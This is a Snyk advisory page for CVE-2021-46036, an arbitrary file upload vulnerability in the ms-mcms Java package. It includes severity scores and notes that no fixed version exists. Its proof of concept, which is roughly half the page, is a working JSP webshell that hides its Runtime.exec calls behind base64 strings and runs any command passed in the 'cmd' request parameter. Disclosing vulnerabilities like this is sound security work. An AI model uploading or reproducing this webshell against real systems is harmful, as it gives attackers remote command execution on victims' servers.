Arbitrary File Upload Affecting net.mingsoft:ms-mcms package, versions [0,]
Snyk CVSS
Attack Complexity
Low
Integrity
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.3% (70th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-NETMINGSOFT-2407592
- published 20 Feb 2022
- disclosed 20 Feb 2022
- credit Harry Smith
Introduced: 20 Feb 2022
CVE-2021-46036 Open this link in a new tabHow to fix?
There is no fixed version for net.mingsoft:ms-mcms.
Overview
Affected versions of this package are vulnerable to Arbitrary File Upload via the /file/upload endpoint. A .jspx file will circumvent the filtering set in place and allow the attacker to get a webshell.
##PoC
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
if(request.getParameter("cmd")!=null){
BASE64Decoder decoder = new BASE64Decoder();
Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
Process e = (Process)
rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
Object[]{}), request.getParameter("cmd") );
java.io.InputStream in = e.getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>